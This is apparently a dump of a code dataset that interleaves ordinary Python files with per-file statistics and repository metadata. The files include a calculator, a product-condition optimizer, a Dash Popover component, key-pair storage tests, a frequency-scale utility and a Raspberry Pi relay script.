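A short usage sketch of the Index class defined above, extending the docstring example with remove() and len(); all coordinates are made-up values:
from pyqtree import Index
spindex = Index(bbox=(0, 0, 100, 100))
spindex.insert('duck', (50, 30, 53, 60))
spindex.insert('cookie', (10, 20, 15, 25))
spindex.insert('python', (40, 50, 95, 90))
print(len(spindex))                                  # 3 items indexed
print(sorted(spindex.intersect((51, 51, 86, 86))))   # ['duck', 'python']
spindex.remove('duck', (50, 30, 53, 60))             # bbox must match the one used at insert time
print(sorted(spindex.intersect((51, 51, 86, 86))))   # ['python']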
| 34.821023
| 121
| 0.59566
| 9,635
| 0.786081
| 282
| 0.023007
| 0
| 0
| 0
| 0
| 5,545
| 0.452395
|
b8028a1a0d82b7861ade532f7556efe716f52f14
| 1,136
|
py
|
Python
|
Day10/calci.py
|
viditvarshney/100DaysOfCode
|
eec82c98087093f1aec1cb21acab82368ae785a3
|
[
"MIT"
] | null | null | null |
Day10/calci.py
|
viditvarshney/100DaysOfCode
|
eec82c98087093f1aec1cb21acab82368ae785a3
|
[
"MIT"
] | null | null | null |
Day10/calci.py
|
viditvarshney/100DaysOfCode
|
eec82c98087093f1aec1cb21acab82368ae785a3
|
[
"MIT"
] | null | null | null |
from logo import logo
def add(n1, n2):
return n1 + n2
def multiply(n1, n2):
return n1 * n2
def subtract(n1, n2):
return n1 - n2
def divide(n1, n2):
return n1 / n2
symbols = ['+', '-', '/', '*']
operations = {'+': add, '-': subtract,
'*': multiply, '/': divide}
def Calci():
print(logo)
num1 = float(input("Enter 1st number: "))
for key in operations:
print(key)
while True:
choice = input("Choose an operation: ")
if not choice in symbols:
print("WARNING! Invalid Operation symbol: ")
break
num2 = float(input("Enter next number: "))
calculation_func = operations[choice]
result = calculation_func(num1, num2)
print(f"{num1} {choice} {num2} = {result}")
clear = input(
f"Type 'y to continue with {result} or 'new' to start a new calculation 'n' to exit: ")
if clear.casefold() == 'y':
num1 = result
elif clear.casefold() == 'new':
Calci()
else:
print(f"Your final result is: {result}")
break
Calci()
| 21.037037
| 100
| 0.529049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.254401
|
b805c6c952721423e773c7922c3d8b331193cf4b
| 6,089
|
py
|
Python
|
shoptimizer_api/optimizers_builtin/condition_optimizer.py
|
leozz37/shoptimizer
|
a940306cba4040e9d69e1ae2ce077c2a6a108c1f
|
[
"Apache-2.0"
] | null | null | null |
shoptimizer_api/optimizers_builtin/condition_optimizer.py
|
leozz37/shoptimizer
|
a940306cba4040e9d69e1ae2ce077c2a6a108c1f
|
[
"Apache-2.0"
] | null | null | null |
shoptimizer_api/optimizers_builtin/condition_optimizer.py
|
leozz37/shoptimizer
|
a940306cba4040e9d69e1ae2ce077c2a6a108c1f
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""A module for Shoptimizer API that fixes invalid condition values.
Reference: https://support.google.com/merchants/answer/6324469
If the condition field is specified as "new", but other fields in the
product imply that the condition is otherwise, this optimizer will reset
the condition value to "used".
"""
import logging
from typing import Any, Dict, List, Set
from flask import current_app
from optimizers_abstract import base_optimizer
_NEW = 'new'
_USED = 'used'
class ConditionOptimizer(base_optimizer.BaseOptimizer):
"""An optimizer that fixes invalidly-set condition fields."""
_OPTIMIZER_PARAMETER = 'condition-optimizer'
_condition_config = None
def _optimize(self, product_batch: Dict[str, Any], language: str,
country: str, currency: str) -> int:
"""Runs the optimization.
Fixes invalid condition values.
See above for the definition of an invalid condition value.
Args:
product_batch: A batch of product data.
language: The language to use for this optimizer.
country: The country to use for this optimizer.
currency: The currency to use for this optimizer.
Returns:
The number of products affected by this optimization.
"""
num_of_products_optimized = 0
self._condition_config = current_app.config.get('CONFIGS', {}).get(
f'condition_optimizer_config_{language}', {})
for entry in product_batch['entries']:
product = entry['product']
google_product_category = product.get('googleProductCategory', '')
if self._is_google_product_category_excluded(google_product_category):
logging.info(
'Product ID: %s with category %s was flagged for exclusion '
'from the condition check', product.get('offerId', ''),
google_product_category)
continue
used_tokens = set(
token.lower() for token in self._condition_config['used_tokens'])
logging.info('Used tokens were %s', used_tokens)
if product.get('condition', '') == _NEW:
# Category format must follow the official spec to be converted a list.
# Ref: https://support.google.com/merchants/answer/6324436?hl=en.
product_categories = google_product_category.split(' > ')
if isinstance(product_categories, list) and product_categories:
lowest_level_category = product_categories[-1]
category_specific_tokens = self._get_tokens_for_category(
lowest_level_category)
if category_specific_tokens:
category_specific_tokens = set(
token.lower() for token in category_specific_tokens)
used_tokens.update(category_specific_tokens)
# Search for used tokens in both title and description and reset the
# condition to used if any were detected.
product_title = product.get('title', '')
product_description = product.get('description', '')
if self._field_contains_used_tokens(
product_title, used_tokens) or self._field_contains_used_tokens(
product_description, used_tokens):
product['condition'] = _USED
logging.info('Modified item %s: Setting new product to used.',
product.get('offerId', ''))
num_of_products_optimized += 1
base_optimizer.set_optimization_tracking(product,
base_optimizer.SANITIZED)
return num_of_products_optimized
def _is_google_product_category_excluded(
self, google_product_category: str) -> bool:
"""Checks if the provided category was found in the exclusions config dict.
Args:
google_product_category: A string representing the product category.
Returns:
True if the given category was found in the condition config's list of
categories to exclude from being optimized for condition due to those
categories being at higher risk of containing false-positives.
"""
excluded_categories = self._condition_config.get(
'excluded_product_categories', [])
# Ensure that the exclude category from the config matches the product's
# category from the beginning of the string in order to support an entire
# category family being matched, as well as enforcing avoidance of unrelated
# matches if only a sub-category was specified.
return any(
google_product_category.startswith(category_to_exclude)
for category_to_exclude in excluded_categories)
def _field_contains_used_tokens(self, field_text: str,
used_tokens: Set[str]) -> bool:
"""Checks if the provided field contains any terms in the given set.
Args:
field_text: A string representing the value of a product field.
used_tokens: A set representing used condition indicators.
Returns:
True if any term was found in the target product field, otherwise False.
"""
return any(token in field_text.lower() for token in used_tokens)
def _get_tokens_for_category(self, product_category: str) -> List[str]:
"""Gets the values in a list of dictionaries if the provided category was found.
Args:
product_category: The product's lowest-level category.
Returns:
A list of the tokens of the matching category, or an empty list.
"""
category_mappings = self._condition_config['target_product_categories']
return category_mappings.get(product_category, [])
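A hedged sketch of the inputs this optimizer reads; the shapes are inferred from the code above and all values are invented for illustration:
condition_optimizer_config_en = {
    "used_tokens": ["used", "pre-owned", "refurbished"],
    "excluded_product_categories": ["Media > Books"],
    "target_product_categories": {"Cell Phones": ["unlocked"]},
}
product_batch = {
    "entries": [{
        "product": {
            "offerId": "1234",
            "title": "Refurbished phone",
            "description": "...",
            "condition": "new",
            "googleProductCategory": "Electronics > Communications > Telephony > Cell Phones",
        }
    }]
}
# With this config, the title token "refurbished" would cause the condition to be reset to "used".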
| 40.059211
| 84
| 0.702414
| 5,010
| 0.822795
| 0
| 0
| 0
| 0
| 0
| 0
| 3,288
| 0.53999
|
b805e135095833b9aacb9e146ceaa3844c6781fb
| 670
|
py
|
Python
|
setup.py
|
comradepopo/p4rmyknife
|
e34a12a86cc090e3add25dc5baa7f6629586a4c6
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
comradepopo/p4rmyknife
|
e34a12a86cc090e3add25dc5baa7f6629586a4c6
|
[
"Apache-2.0"
] | 1
|
2019-10-18T23:10:11.000Z
|
2019-10-18T23:10:11.000Z
|
setup.py
|
comradepopo/p4rmyknife
|
e34a12a86cc090e3add25dc5baa7f6629586a4c6
|
[
"Apache-2.0"
] | null | null | null |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Package metadata
config = {
'description': 'P4rmyKnife - The Swiss Army Knife for P4',
'author': 'Assembla, Inc.',
'url': 'https://assembla.com/',
'author_email': 'louis@assembla.com',
'version': '0.1',
'install_requires': [],
'packages': ['p4rmyknife'],
'scripts': [],
'name': 'p4rmyknife'
}
setup(name='p4rmyknife',
description='P4rmyKnife - The Swiss Army Knife for P4',
author='Assembla, Inc.',
url='https://assembla.com/',
author_email='louis@assembla.com',
version='0.1',
install_requires=[],
packages=['p4rmyknife'],
scripts=[]
)
| 25.769231
| 62
| 0.626866
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 352
| 0.525373
|
b807feaa7b46fd15709c8ce5d95d9ec7f33de619
| 446
|
py
|
Python
|
utilities/readProperties.py
|
harry-100/qa-automation-framework
|
5fbe03e930820537e53f2d26b1c2b2bd2b222bf5
|
[
"MIT"
] | null | null | null |
utilities/readProperties.py
|
harry-100/qa-automation-framework
|
5fbe03e930820537e53f2d26b1c2b2bd2b222bf5
|
[
"MIT"
] | null | null | null |
utilities/readProperties.py
|
harry-100/qa-automation-framework
|
5fbe03e930820537e53f2d26b1c2b2bd2b222bf5
|
[
"MIT"
] | null | null | null |
from configparser import RawConfigParser
config = RawConfigParser()
config.read("configuration/config.ini")
class ReadConfig():
@staticmethod
def getApplicationURL():
url = (config.get('common info', 'baseURL'))
return url
@staticmethod
def getUserName():
username = (config.get('common info', 'username'))
return username
@staticmethod
def getPassword():
password = (config.get('common info', 'password'))
return password
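A hedged sketch of the configuration/config.ini layout this helper expects, with invented values, followed by a typical call:
# configuration/config.ini (invented values):
#   [common info]
#   baseURL = https://example.com
#   username = testuser
#   password = secret
base_url = ReadConfig.getApplicationURL()   # -> "https://example.com"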
| 20.272727
| 52
| 0.7287
| 334
| 0.748879
| 0
| 0
| 307
| 0.688341
| 0
| 0
| 94
| 0.210762
|
b80bab1732354a9bf5c8b8066aa6d633362ec4a1
| 181
|
py
|
Python
|
tinyq/__init__.py
|
mozillazg/tinyq
|
fd9ecc593931c9b315c4aeb9150389b3e4ae670e
|
[
"MIT"
] | 14
|
2017-08-02T23:30:16.000Z
|
2021-05-31T19:58:29.000Z
|
tinyq/__init__.py
|
mozillazg/tinyq
|
fd9ecc593931c9b315c4aeb9150389b3e4ae670e
|
[
"MIT"
] | null | null | null |
tinyq/__init__.py
|
mozillazg/tinyq
|
fd9ecc593931c9b315c4aeb9150389b3e4ae670e
|
[
"MIT"
] | 2
|
2017-03-13T09:36:05.000Z
|
2017-10-27T14:33:48.000Z
|
# -*- coding: utf-8 -*-
from tinyq.app import Application # noqa
__version__ = '0.3.0'
__author__ = 'mozillazg'
__license__ = 'MIT'
__copyright__ = 'Copyright (c) 2017 mozillazg'
| 22.625
| 46
| 0.696133
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 82
| 0.453039
|
b80bd1236784afca06c2fdaedb154f5764c38921
| 258
|
py
|
Python
|
henrietta/tests/__init__.py
|
zkbt/henrietta
|
653d798b241ad5591b704967a0413a2457a4e734
|
[
"MIT"
] | null | null | null |
henrietta/tests/__init__.py
|
zkbt/henrietta
|
653d798b241ad5591b704967a0413a2457a4e734
|
[
"MIT"
] | 12
|
2018-09-12T03:56:04.000Z
|
2019-02-15T04:12:53.000Z
|
henrietta/tests/__init__.py
|
zkbt/henrietta
|
653d798b241ad5591b704967a0413a2457a4e734
|
[
"MIT"
] | null | null | null |
from .test_lightcurves import *
from .test_statistics import *
from .test_models import *
from .test_fitting import *
from .test_tools import *
from .test_photometry import *
from .test_tpf import *
from .test_imaging import *
from .test_photometry import *
| 25.8
| 31
| 0.790698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b80c3a78699daca713934719586192ebb12c7028
| 340
|
py
|
Python
|
personas.py
|
Ulzahk/Practica-Python-CRUD
|
2657be639bce88e5774f3b16c11ecbb33c41bc83
|
[
"MIT"
] | null | null | null |
personas.py
|
Ulzahk/Practica-Python-CRUD
|
2657be639bce88e5774f3b16c11ecbb33c41bc83
|
[
"MIT"
] | null | null | null |
personas.py
|
Ulzahk/Practica-Python-CRUD
|
2657be639bce88e5774f3b16c11ecbb33c41bc83
|
[
"MIT"
] | null | null | null |
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def say_hello(self):
print('Hello, my name is {} and I am {} years old'.format(self.name, self.age))
if __name__ == '__main__':
person = Person('David', 34)
print('Age: {}'.format(person.age))
person.say_hello()
| 18.888889
| 87
| 0.585294
| 212
| 0.623529
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.205882
|
b80d9fd4d22bb1d71b3dd29f2cdfd01260186b03
| 614
|
py
|
Python
|
python/right_couch_move.py
|
ktmock13/PiCouch
|
21992efca9fa382c7a02c10fb037a994143038c6
|
[
"Apache-2.0"
] | null | null | null |
python/right_couch_move.py
|
ktmock13/PiCouch
|
21992efca9fa382c7a02c10fb037a994143038c6
|
[
"Apache-2.0"
] | null | null | null |
python/right_couch_move.py
|
ktmock13/PiCouch
|
21992efca9fa382c7a02c10fb037a994143038c6
|
[
"Apache-2.0"
] | null | null | null |
import RPi.GPIO as GPIO
from time import sleep
import sys
#setup
GPIO.setmode(GPIO.BOARD)
openRelay=11
closeRelay=13
GPIO.setup(openRelay, GPIO.OUT)
GPIO.setup(closeRelay, GPIO.OUT)
#get cmd args
duration = float(sys.argv[1])
opening = sys.argv[2] in ['true', 'True', '1', 'TRUE']
relay = openRelay if opening else closeRelay
#start
GPIO.output(relay, GPIO.HIGH)
print('starting ' + ('open' if opening else 'close') + ' signal..')
#wait
print('  ' + str(duration) + 'secs')
sleep(duration)
#stop
print('  ...ending signal')
GPIO.output(relay, GPIO.LOW)
| 20.466667
| 66
| 0.640065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 178
| 0.289902
|
b80eb5f1166695a86c73eccb3c18067bd324e51b
| 3,725
|
py
|
Python
|
lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py
|
dukuaris/Django
|
d34f3e3f09028511e96b99cae7faa1b46458eed1
|
[
"MIT"
] | null | null | null |
lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py
|
dukuaris/Django
|
d34f3e3f09028511e96b99cae7faa1b46458eed1
|
[
"MIT"
] | 12
|
2020-06-06T01:22:26.000Z
|
2022-03-12T00:13:42.000Z
|
lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py
|
dukuaris/Django
|
d34f3e3f09028511e96b99cae7faa1b46458eed1
|
[
"MIT"
] | null | null | null |
# AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Popover(Component):
"""A Popover component.
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional): The children of this component
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- style (dict; optional): Defines CSS styles which will override styles previously set.
- className (string; optional): Often used with CSS to style elements with common properties.
- key (string; optional): A unique identifier for the component, used to improve
performance by React.js while rendering components
See https://reactjs.org/docs/lists-and-keys.html for more info
- placement (a value equal to: 'auto', 'auto-start', 'auto-end', 'top', 'top-start', 'top-end', 'right', 'right-start', 'right-end', 'bottom', 'bottom-start', 'bottom-end', 'left', 'left-start', 'left-end'; optional): Specify popover placement.
- target (string; optional): ID of the component to attach the popover to.
- container (string; optional): Where to inject the popper DOM node, default body.
- is_open (boolean; optional): Whether the Popover is open or not.
- hide_arrow (boolean; optional): Hide popover arrow.
- innerClassName (string; optional): CSS class to apply to the popover.
- delay (dict; optional): Optionally override show/hide delays - default {show: 0, hide: 250}. delay has the following type: dict containing keys 'show', 'hide'.
Those keys have the following types:
- show (number; optional)
- hide (number; optional) | number
- offset (string | number; optional): Popover offset.
- loading_state (dict; optional): Object that holds the loading state object coming from dash-renderer. loading_state has the following type: dict containing keys 'is_loading', 'prop_name', 'component_name'.
Those keys have the following types:
- is_loading (boolean; optional): Determines if the component is loading or not
- prop_name (string; optional): Holds which property is loading
- component_name (string; optional): Holds the name of the component that is loading"""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, style=Component.UNDEFINED, className=Component.UNDEFINED, key=Component.UNDEFINED, placement=Component.UNDEFINED, target=Component.UNDEFINED, container=Component.UNDEFINED, is_open=Component.UNDEFINED, hide_arrow=Component.UNDEFINED, innerClassName=Component.UNDEFINED, delay=Component.UNDEFINED, offset=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self._type = 'Popover'
self._namespace = 'dash_bootstrap_components/_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Popover, self).__init__(children=children, **args)
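A hedged usage sketch for the generated component above; the component ids are invented, and PopoverHeader/PopoverBody are assumed to be available from the same package (in newer Dash versions html components live under dash.html instead of dash_html_components):
import dash_bootstrap_components as dbc
import dash_html_components as html
layout = html.Div([
    html.Button("Click me", id="popover-target"),
    dbc.Popover(
        [dbc.PopoverHeader("Header"), dbc.PopoverBody("Some body text")],
        id="popover",
        target="popover-target",   # id of the component the popover attaches to
        placement="right",
        is_open=False,
    ),
])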
| 67.727273
| 432
| 0.720537
| 3,612
| 0.969664
| 0
| 0
| 1,483
| 0.398121
| 0
| 0
| 2,534
| 0.680268
|
b81062d8563ac7d8651bf77dad80875a2f3da169
| 3,954
|
py
|
Python
|
aries_cloudagent/wallet/tests/test_key_pair.py
|
kuraakhilesh8230/aries-cloudagent-python
|
ee384d1330f6a50ff45a507392ce54f92900f23a
|
[
"Apache-2.0"
] | 247
|
2019-07-02T21:10:21.000Z
|
2022-03-30T13:55:33.000Z
|
aries_cloudagent/wallet/tests/test_key_pair.py
|
kuraakhilesh8230/aries-cloudagent-python
|
ee384d1330f6a50ff45a507392ce54f92900f23a
|
[
"Apache-2.0"
] | 1,462
|
2019-07-02T20:57:30.000Z
|
2022-03-31T23:13:35.000Z
|
aries_cloudagent/wallet/tests/test_key_pair.py
|
kuraakhilesh8230/aries-cloudagent-python
|
ee384d1330f6a50ff45a507392ce54f92900f23a
|
[
"Apache-2.0"
] | 377
|
2019-06-20T21:01:31.000Z
|
2022-03-30T08:27:53.000Z
|
from asynctest import TestCase as AsyncTestCase
import json
from ...storage.error import StorageNotFoundError
from ..util import bytes_to_b58
from ..key_type import KeyType
from ...core.in_memory import InMemoryProfile
from ...storage.in_memory import InMemoryStorage
from ..key_pair import KeyPairStorageManager, KEY_PAIR_STORAGE_TYPE
class TestKeyPairStorageManager(AsyncTestCase):
test_public_key = b"somepublickeybytes"
test_secret = b"verysecretkey"
async def setUp(self):
self.profile = InMemoryProfile.test_profile()
self.store = InMemoryStorage(self.profile)
self.key_pair_mgr = KeyPairStorageManager(self.store)
async def test_create_key_pair(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
)
verkey = bytes_to_b58(self.test_public_key)
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
value = json.loads(record.value)
assert record.tags == {"verkey": verkey, "key_type": KeyType.ED25519.key_type}
assert value["verkey"] == verkey
assert value["secret_key"] == bytes_to_b58(self.test_secret)
assert value["metadata"] == {}
assert value["key_type"] == KeyType.ED25519.key_type
async def test_get_key_pair(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
)
verkey = bytes_to_b58(self.test_public_key)
key_pair = await self.key_pair_mgr.get_key_pair(verkey)
assert key_pair["verkey"] == verkey
assert key_pair["secret_key"] == bytes_to_b58(self.test_secret)
assert key_pair["metadata"] == {}
assert key_pair["key_type"] == KeyType.ED25519.key_type
async def test_get_key_pair_x_not_found(self):
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.get_key_pair("not_existing_verkey")
async def test_delete_key_pair(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
)
verkey = bytes_to_b58(self.test_public_key)
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
await self.key_pair_mgr.delete_key_pair(verkey)
# should be deleted now
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.delete_key_pair(verkey)
async def test_delete_key_pair_x_not_found(self):
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.delete_key_pair("non_existing_verkey")
async def test_update_key_pair_metadata(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
metadata={"some": "data"},
)
verkey = bytes_to_b58(self.test_public_key)
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
value = json.loads(record.value)
assert value["metadata"] == {"some": "data"}
await self.key_pair_mgr.update_key_pair_metadata(verkey, {"some_other": "data"})
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
value = json.loads(record.value)
assert value["metadata"] == {"some_other": "data"}
async def test_update_key_pair_metadata_x_not_found(self):
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.update_key_pair_metadata("non_existing_verkey", {})
| 35.303571
| 88
| 0.687405
| 3,613
| 0.913758
| 0
| 0
| 0
| 0
| 3,439
| 0.869752
| 333
| 0.084219
|
b8116854eec000b484014c431645628bfade8561
| 6,191
|
py
|
Python
|
sonipy/scales/frequency.py
|
Sabrina-Knappe/sonipy
|
eaf89afaee0d9c2d5ba7a035d43e651b8919b84e
|
[
"MIT"
] | 22
|
2020-07-04T19:05:25.000Z
|
2022-02-25T08:39:01.000Z
|
sonipy/scales/frequency.py
|
Sabrina-Knappe/sonipy
|
eaf89afaee0d9c2d5ba7a035d43e651b8919b84e
|
[
"MIT"
] | 6
|
2020-07-07T17:09:00.000Z
|
2021-04-12T16:37:41.000Z
|
sonipy/scales/frequency.py
|
Sabrina-Knappe/sonipy
|
eaf89afaee0d9c2d5ba7a035d43e651b8919b84e
|
[
"MIT"
] | 6
|
2020-07-07T08:28:33.000Z
|
2021-12-21T03:52:09.000Z
|
from __future__ import print_function
import warnings
import numpy as np
C4 = 261.6 # Hz
piano_max = 4186.01 # Hz
piano_min = 27.5000 # Hz - not audible
__all__ = ['cent_per_value','get_f_min','get_f_max','FrequencyScale']
def cent_per_value(f_min, f_max, v_min, v_max):
"""
This function takes in a frequency max and min, and y value max and min and returns a y scale parameter in units of cents/y value.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_min : float
Minimum frequency.
f_max : float
Maximum frequency.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
A y-scale parameter in units of cents/y value.
"""
step = 1200 * np.log2(f_max / f_min) / (v_max - v_min)
return step
def get_f_min(f_max, cents_per_value, v_min, v_max):
"""
This function takes in a y value max and min, a maximum frequency and a y scale parameter in units of cents/y value, and returns the minimum frequency that fits to such a scale.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_max : float
Maximum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
Minimum frequency.
"""
f_min = f_max / (2 ** ((v_max - v_min) * cents_per_value / 1200))
return f_min
def get_f_max(f_min, cents_per_value, v_min, v_max):
"""
This function takes in a y value max and min, a minimum frequency and a y scale parameter in units of cents/y value, and returns the maximum frequency that fits to such a scale.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_min : float
Minimum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
Maximum frequency.
"""
f_max = f_min * (2 ** ((v_max - v_min) * cents_per_value / 1200))
return f_max
class FrequencyScale(object):
"""
This class builds a frequency scale and populates the namespace of frequency objects based on the given inputs from the following combos:
- frequency_min, frequency_max, y value min and y value max
- frequency_max, cents_per_value, y value min and y value max
- frequency_min, cents_per_value, y value min and y value max
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
frequency_min : float
Minimum frequency.
frequency_max : float
Maximum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
value_min : float
Minimum y value.
value_max : float
Maximum y value.
verbose : bool
Flag to toggle printing functions.
"""
def __init__(self, value_min, value_max,
frequency_min=None, frequency_max=None, cents_per_value=None,
verbose=False):
if verbose:
print('initial vals (fmin, fmax, vmin, vmax):',
frequency_min, frequency_max, value_min, value_max)
# checking for which inputs were given
self.y_inputs = []
if frequency_min != None:
self.y_inputs.append('frequency_min')
if frequency_max != None:
self.y_inputs.append('frequency_max')
if cents_per_value != None:
self.y_inputs.append('cents_per_value')
self.y_n_inputs = len(self.y_inputs)
# raising exception if anything other than two inputs were given
if self.y_n_inputs != 2:
raise Exception('Frequency takes 2 of the frequency_min, frequency_max, and cents_per_value inputs. You inputted {} inputs, which were {}.'.format(
self.y_n_inputs, self.y_inputs))
# frequency_min and frequency_max input case
if (cents_per_value == None):
cents_per_value = cent_per_value(frequency_min, frequency_max,
value_min, value_max)
# cents_per_value and frequency_max input case
if (frequency_min == None):
frequency_min = get_f_min(frequency_max, cents_per_value,
value_min, value_max)
# cents_per_value and frequency_min input case
if (frequency_max == None):
frequency_max = get_f_max(frequency_min, cents_per_value,
value_min, value_max)
self.y_value_min = value_min
self.y_value_max = value_max
self.y_frequency_max = frequency_max
self.y_frequency_min = frequency_min
self.y_cents_per_value = cents_per_value
if self.y_frequency_max > piano_max:
warnings.warn('Your maximum frequency of {} Hz is above a pianos maximum of {} Hz.'.format(
np.round(self.y_frequency_max, 2), piano_max))
if self.y_frequency_min < piano_min:
warnings.warn('Your minimum frequency of {} Hz is below a pianos minimum of {} Hz.'.format(
np.round(self.y_frequency_min, 2), piano_min))
if self.y_value_min > self.y_value_max:
warnings.warn('Min y value is greater than max y value.')
if verbose:
print('initial vals (f_min, f_max, y_min, y_max):', self.y_frequency_min,
self.y_frequency_max, self.y_value_min, self.y_value_max)
def freq(v): return self.y_frequency_min * \
2 ** ((v - self.y_value_min) * self.y_cents_per_value / 1200)
self.y_freq_translate_to_range = lambda array: list(map(freq, array))
if verbose:
print('Frequency Scale Built')
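A worked example of the cents relation used above (illustrative numbers): mapping y values 0..10 onto the octave above C4, which spans 1200 cents:
f_lo, f_hi = 261.6, 523.2
step = cent_per_value(f_lo, f_hi, 0, 10)
print(round(step, 1))   # -> 120.0 cents per y unit
scale = FrequencyScale(value_min=0, value_max=10,
                       frequency_min=f_lo, frequency_max=f_hi)
print(scale.y_freq_translate_to_range([0, 5, 10]))
# -> roughly [261.6, 370.0, 523.2] Hz; the midpoint lands a tritone above the minimum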
| 34.977401
| 181
| 0.63237
| 3,800
| 0.613794
| 0
| 0
| 0
| 0
| 0
| 0
| 3,389
| 0.547408
|
b8118840491eaf33f7fcef02b6ab1cab5378d698
| 338
|
py
|
Python
|
core_admin/des/ccd/daemon.py
|
linea-it/tno
|
f973381280504ceb1b606b5b3ccc79b6b8c2aa4f
|
[
"MIT"
] | null | null | null |
core_admin/des/ccd/daemon.py
|
linea-it/tno
|
f973381280504ceb1b606b5b3ccc79b6b8c2aa4f
|
[
"MIT"
] | 112
|
2018-04-24T19:10:55.000Z
|
2022-02-26T16:55:02.000Z
|
core_admin/des/ccd/daemon.py
|
linea-it/tno
|
f973381280504ceb1b606b5b3ccc79b6b8c2aa4f
|
[
"MIT"
] | null | null | null |
from apscheduler.schedulers.background import BackgroundScheduler
from des.ccd import start_pipeline
def download_queue():
start_pipeline()
scheduler = BackgroundScheduler()
scheduler.add_job(
download_queue,
'interval',
# minutes=1
seconds=20,
max_instances=1,
id='des_download_ccd'
)
scheduler.start()
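One hedged usage note: BackgroundScheduler runs jobs on a background thread, so a standalone script (outside a long-lived Django process like this one) would need to keep the main thread alive, for example:
import time
try:
    while True:
        time.sleep(1)
except (KeyboardInterrupt, SystemExit):
    scheduler.shutdown()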
| 16.095238
| 65
| 0.739645
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.115385
|
b811d6fa0121474e3b20b511fc6bfce131c9ffa7
| 440
|
py
|
Python
|
calc-app/input_console.py
|
t4d-classes/python_10042021
|
e2c28448ad66784c429655ab766f902b76d6ac79
|
[
"MIT"
] | null | null | null |
calc-app/input_console.py
|
t4d-classes/python_10042021
|
e2c28448ad66784c429655ab766f902b76d6ac79
|
[
"MIT"
] | null | null | null |
calc-app/input_console.py
|
t4d-classes/python_10042021
|
e2c28448ad66784c429655ab766f902b76d6ac79
|
[
"MIT"
] | null | null | null |
from common.input import input_int, input_float
def get_operand():
return input_float("Please enter an operand: ")
def get_command():
return input("Enter a command: ")
def get_history_entry_id():
return input_int("Please enter a history entry id: ")
def get_history_file_name():
return input("Enter a history file name: ")
def get_history_report_file_name():
return input("Enter a history report file name: ")
| 20
| 57
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 146
| 0.331818
|
b811e4d73c683e7404a77a68edf057c683bf41a7
| 1,872
|
py
|
Python
|
tools/stimgen/gen_recall.py
|
herenvarno/gsbn
|
47ed0932b605d8b3cf9661f9308908364ad5892e
|
[
"MIT"
] | 2
|
2016-08-12T15:06:02.000Z
|
2021-10-05T08:12:17.000Z
|
